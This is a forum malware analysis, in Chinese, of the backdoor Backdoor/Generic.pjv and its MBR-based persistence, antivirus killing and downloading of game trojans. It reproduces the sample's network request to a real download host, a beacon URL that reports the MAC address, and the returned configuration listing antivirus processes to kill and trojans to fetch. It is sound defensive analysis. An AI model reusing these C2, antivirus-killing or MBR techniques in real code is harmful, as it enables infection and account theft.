“通犯”变种pjv频繁攻击用户成7月主要安全威胁

淡淡体味

“通犯”变种pjv频繁攻击用户成7月主要安全威胁

来自：MACD论坛(bbs.macd.cn) 作者：淡淡体味 浏览：2720 回复：0

Backdoor/Generic.pjv运行后，首先是加载自己的驱动程序,驱动程序本身不具备破坏性，它等待病毒程序的唤醒操作，再进入破坏的流程，具体有感染MBR达到开机自动更新病毒，破坏杀毒软件，让杀毒失效。
病毒程序本身在完成驱动加载，磁盘读取之后，再进行联网操作，下载网络游戏木马，至本地。如果有杀毒软件的进程运行，内核层直接结束。下载的游戏木马太多，功能也各不一样，伪装成杀毒软件的名称运行。
病毒描述

病毒名称    : Backdoor/Generic.pjv
文件MD5     : 32f7445e7aeff1e49e7e5126bda85664
文件大小    : 139,264字节
编写环境    : C++
是否加壳    : 无


文档公开级别 ： 完全公开



病毒执行体描述：

    Backdoor/Generic.pjv运行后，首先是加载自己的驱动程序,驱动程序本身不具备破坏性，它等待病毒程序的唤醒操作，再进入破坏的流程，具体有感染MBR达到开机自动更新病毒，破坏杀毒软件，让杀毒失效。
病毒程序本身在完成驱动加载，磁盘读取之后，再进行联网操作，下载网络游戏木马，至本地。如果有杀毒软件的进程运行，内核层直接结束。下载的游戏木马太多，功能也各不一样，伪装成杀毒软件的名称运行。


病毒行为流程分析:

一．
    此样本传播的途径不详，初次运行后会释放驱动程序，并完成驱动的安装。驱动程序本身并不执行相关操作，它则是等待病毒程序在用户层发送IOCTL码，而执行相关操作。
驱动程序内分为四个部分:
IOCTL: 0x222400
    完成对IRP_MJ_FLUSH_BUFFERS和IRP_MJ_SHUTDOWN 派遣函数的挂钩,经过后面分析得出挂钩两个历程是为了确保MBR的修改是成功的,防止以防修改错误启动失败。
IOCTL: 0x222404
    完成对MBR的写入操作,对用户层传来的数据进行保存,第一步是保存原始MBR,此处的此病毒的做法是512字节整体覆盖,到执行到病毒MBR完成相关操作后,会把MBR的执行权丢给系统原始MBR，进行启动操作。
IOCTL: 0x222408
IOCTL: 0x22240C
文件删除的相关操作。

二．
病毒用户层部分大致可以分为五个部分:
1.将驱动文件释放到磁盘中,资源文件保存的方法比较特别。
2.遍历系统当前的进程,看是否有杀软的进程。
3.加载驱动相关钩子的安装。
4.阻止杀毒软件的运行。
5.连网下载游戏木马病毒程序，主要的功能是为了完成游戏木马的下载，程序更新的方式使用修改MBR达到开机更新木马。

三．
  当系统当前无任何防护状态下,病毒会连接网站下载其他游戏木马，读取一段加密的数据。
  在解密的数据区内寻找字节特征 77 66 55 44 77 88 99 AA，定位到存放网页地址的位置，需要连接的地址。
  动态加载iphlpapi.php , GetAdaptersInfo 获取计算机网卡相关信息
/count/count.asp?mac=00-0C-29-72-3C-84&time=1341367221&procs=%PROCS&id=0005&run=NEXT
将计算得到的信息保存起来,传到服务器,作为安装依据。
使用完数据以后,在进行相关数据加密。
以Send Recv方式进行80端口的数据报发送,避免调用WebAPI。


00D30020  47 45 54 20 2F 72 75 6E 35 2E 74 78 74 20 48 54  GET /run5.txt HT
00D30030  54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 77 77 77  TP/1.1..Host:www
00D30040  2E 7A 70 6C 79 61 2E 63 6F 6D 3A 38 30 38 32 0D  .zplya.com:8082.
00D30050  0A 52 61 6E 67 65 3A 20 62 79 74 65 73 3D 30 2D  .Range: bytes=0-
00D30060  34 30 39 35 0D 0A 41 63 63 65 70 74 3A 20 2A 2F  4095..Accept: */
00D30070  2A 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 4D 6F  *..User-Agent:Mo
00D30080  7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61  zilla/4.0 (compa
00D30090  74 69 62 6C 65 3B 20 4D 53 49 45 20 35 2E 30 30  tible; MSIE 5.00
00D300A0  3B 20 57 69 6E 64 6F 77 73 20 39 38 29 0D 0A 43  ; Windows 98)..C
00D300B0  6F 6E 6E 65 63 74 69 6F 6E 3A 4B 65 65 70 2D 41  onnection:Keep-A
00D300C0  6C 69 76 65 0D 0A 0D 0A 00 00 00 00 00 00 00 00  live............

成功则返回下列数据
TIME=2400
RUNMODE=3
KILLPROCLIST=360tray.exe|360sd.exe|360rp.exe|360rps.exe|ZhuDongFangYu.exe|360leakfixer.exe|avp.exe|avp.exe|popwndexe.exe|RavMonD.exe|RsMgrSvc.exe|RsTray.exe|RsAgent.exe|KSafeSvc.exe|KSafeTray.exe|kxescore.exe|kxetray.exe|KVExpert.exe|KVMonXP.exe|KVSrvXP.exe|egui.exe|ekrn.exe

DOWNLIST=DOWN:/wm1/cs.exe,LOOP|DOWN:/wm1/mh.exe,LOOP|DOWN:/wm1/tl.exe,LOOP|DOWN:/wm1/wendao.exe,LOOP|DOWN:/wm1/wow.exe,LOOP|DOWN:/wm1/yy.exe,LOOP|DOWN:/wm1/qq.exe|DOWN:/wm1/dnf.exe,LOOP|DOWN:/wm1/my.exe,LOOP|DOWN:/wm1/m3guo.exe,LOOP|DOWN:/wm/hx.exe,LOOP

00403068 call 00401023    _DownloadFile_Execut 调用此函数,完成样本下载并执行。
当下载执行结束以后则向驱动发送自删的请求。



释放的文件:

%SystemRoot%System32Drivers44ff12c.sys
//杀软控制以及MBR写入的文件。
%SystemRoot%XXX.exe      
//下载的病毒集合，以及随机文件名称。


病毒技术要点

    病毒对系统对自身避免杀毒查杀上做了很多规避,利用修改MBR达到病毒无文件自启动，对系统的支持性和容错方面做了一些判断，程序第一次运行和重启以后运行的流程完全不一样。
    但是达到一个完整的效果，就是下载游戏木马病毒。第一次的运行在对MBR写入后,在相应修改MBR位置所对应的区域也是自己存放原始MBR以及启动数据代码Hook相关的操作。
    在写入MBR时,Hook IRP_MJ_FLUSH_BUFFERS和IRP_MJ_SHUTDOWN，确保MBR是三段完全写入的。防止自身被欺骗。但是在重启过以后，Hook的对象IRP_MJ_Read和IRP_MJ_WRITE, 保证自己有可执行用户层样本的权限。



病毒清理流程

1. 病毒自身不会对MBR进行监视,一次操作以后自身删除,不再管MBR了。
2．在保证病毒体不被运行的情况下,可以修复MBR分区表,当MBR恢复以后程序自身不会被加载到。
3．样本未对BIOS进行修改，可以直接用相关工具直接修复。

Fdisk/MBR修复法
    用启动盘启动电脑，在命令提示符下输入“Fdisk/mbr”命令，再按”Enter”键即可进行修复。
    用Fdisk/mbr命令修复 MBR的方法只适用于主引导区记录被引导区型病毒破坏或主引导记录代码丢失，且主分区没有损坏的情况。因为此方法只是覆盖主引导区记录的代码，不能重建主分区表。
    启动 DOS并输入“C：” ，按“Enter”键，如果可以读取C盘数据就能用Fdisk/MBR命令恢复MBR，且能保留原有数据；否则不能用Fdisk/MBR命令恢复MBR。